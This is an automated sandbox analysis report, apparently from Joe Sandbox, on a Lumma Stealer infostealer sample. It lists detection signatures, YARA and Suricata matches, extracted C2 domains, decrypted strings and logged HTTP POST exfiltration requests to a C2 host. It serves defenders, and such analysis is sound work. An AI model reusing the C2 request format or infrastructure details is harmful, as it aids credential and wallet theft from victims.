Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1583463
MD5:	2ea329cf21fe95c260ea3b956b6fbb75
SHA1:	4c8a6dfe97d33ada86c65298ad91ab46eddc8454
SHA256:	36c05fed693856403b0e8aa36b032d350424ec12a657cb9a98f974f218db3884
Tags:	exeuser-jstrosch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 4048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2EA329CF21FE95C260EA3B956B6FBB75)

WerFault.exe (PID: 6916 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["enterwahsh.biz", "slipperyloo.lat", "wordyfindy.lat", "talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1287375743.0000000000783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1300615651.0000000000781000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: file.exe PID: 4048	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 4048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4048	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 9 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:37.300052+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	104.102.49.254	443	TCP
2025-01-02T20:16:38.960921+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	172.67.157.254	443	TCP
2025-01-02T20:16:40.006203+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	172.67.157.254	443	TCP
2025-01-02T20:16:41.147673+0100	2028371	3	Unknown Traffic	192.168.2.7	49703	172.67.157.254	443	TCP
2025-01-02T20:16:42.581309+0100	2028371	3	Unknown Traffic	192.168.2.7	49704	172.67.157.254	443	TCP
2025-01-02T20:16:44.220146+0100	2028371	3	Unknown Traffic	192.168.2.7	49705	172.67.157.254	443	TCP
2025-01-02T20:16:46.058309+0100	2028371	3	Unknown Traffic	192.168.2.7	49706	172.67.157.254	443	TCP
2025-01-02T20:16:47.123519+0100	2028371	3	Unknown Traffic	192.168.2.7	49708	172.67.157.254	443	TCP
2025-01-02T20:16:48.194549+0100	2028371	3	Unknown Traffic	192.168.2.7	49714	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:39.387797+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49701	172.67.157.254	443	TCP
2025-01-02T20:16:40.457154+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49702	172.67.157.254	443	TCP
2025-01-02T20:16:49.039380+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49714	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:39.387797+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49701	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:40.457154+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49702	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.612478+0100	2058480	1	Domain Observed Used for C2 Detected	192.168.2.7	52039	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.589526+0100	2058484	1	Domain Observed Used for C2 Detected	192.168.2.7	64956	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.519517+0100	2058608	1	Domain Observed Used for C2 Detected	192.168.2.7	54538	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.555116+0100	2058492	1	Domain Observed Used for C2 Detected	192.168.2.7	53937	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.565149+0100	2058500	1	Domain Observed Used for C2 Detected	192.168.2.7	53377	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.543814+0100	2058502	1	Domain Observed Used for C2 Detected	192.168.2.7	61164	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.577393+0100	2058510	1	Domain Observed Used for C2 Detected	192.168.2.7	57664	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.600816+0100	2058512	1	Domain Observed Used for C2 Detected	192.168.2.7	61692	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:36.532234+0100	2058514	1	Domain Observed Used for C2 Detected	192.168.2.7	60167	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:47.622921+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49708	172.67.157.254	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T20:16:38.355437+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.7	49700	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://lev-tolstoi.com/x	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiyp	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apiocal	Avira URL Cloud: Label: malware
Source: enterwahsh.biz	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apix	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api$	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiC	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/B	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/ws	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apisy	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.file.exe.2150000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["enterwahsh.biz", "slipperyloo.lat", "wordyfindy.lat", "talkynicer.lat", "tentabatte.lat", "shapestickyr.lat", "bashfulacid.lat", "manyrestro.lat", "curverpluch.lat"], "Build id": "HpOoIh--2a727a032c4d"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: bashfulacid.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: tentabatte.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: curverpluch.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: talkynicer.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shapestickyr.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: manyrestro.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: slipperyloo.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: wordyfindy.lat
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: enterwahsh.biz
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1245427878.0000000002150000.00000004.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--2a727a032c4d

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041A273 CryptUnprotectData,

0_2_0041A273

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49714 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00440150
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+1Ch]	0_2_0040B1A0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0042CB9F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000000A0h]	0_2_0042CB9F
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0043CF41
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], D2F34142h	0_2_0043CF41
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_0040E7E4
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6DE4BC99h]	0_2_0042A042
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_004250D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push esi	0_2_0040D944
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then test eax, eax	0_2_00438910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], A269EEEFh	0_2_00438910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+5A508E43h]	0_2_00438910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 403020B8h	0_2_0040E1A2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+44h]	0_2_0040F1A2
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movsx esi, bl	0_2_0040824E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042BA60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00415A62
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+38h]	0_2_0040CA7B
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00435210
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00416220
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, dword ptr [0044A2E0h]	0_2_0040C224
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00429AA5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_0041DB6A
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_004253C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+14h]	0_2_0042ABCE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00407420
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00407420
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+03h]	0_2_0041CCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	0_2_004254E9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.7:64956 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.7:54538 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.7:53377 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.7:53937 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.7:61692 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.7:60167 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.7:61164 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.7:52039 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.7:57664 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49708 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49701 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49701 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49702 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49714 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.7:49700 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: enterwahsh.biz
Source: Malware configuration extractor	URLs: slipperyloo.lat
Source: Malware configuration extractor	URLs: wordyfindy.lat
Source: Malware configuration extractor	URLs: talkynicer.lat
Source: Malware configuration extractor	URLs: tentabatte.lat
Source: Malware configuration extractor	URLs: shapestickyr.lat
Source: Malware configuration extractor	URLs: bashfulacid.lat
Source: Malware configuration extractor	URLs: manyrestro.lat
Source: Malware configuration extractor	URLs: curverpluch.lat

Source: Joe Sandbox View	IP Address: 172.67.157.254 172.67.157.254
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49704 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49708 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49714 -> 172.67.157.254:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49706 -> 172.67.157.254:443

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CRHWV3EVPVRBWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12821Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2YLYEFNEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15029Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BN7PQMTTJNCXTFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20384Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KNV94W4VEHFS6930User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1229Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KR9OPG0Z12N8NXIBQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1125Host: lev-tolstoi.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: lev-tolstoi.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: enterwahsh.biz
Source: global traffic	DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic	DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic	DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic	DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic	DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic	DNS traffic detected: DNS query: curverpluch.lat
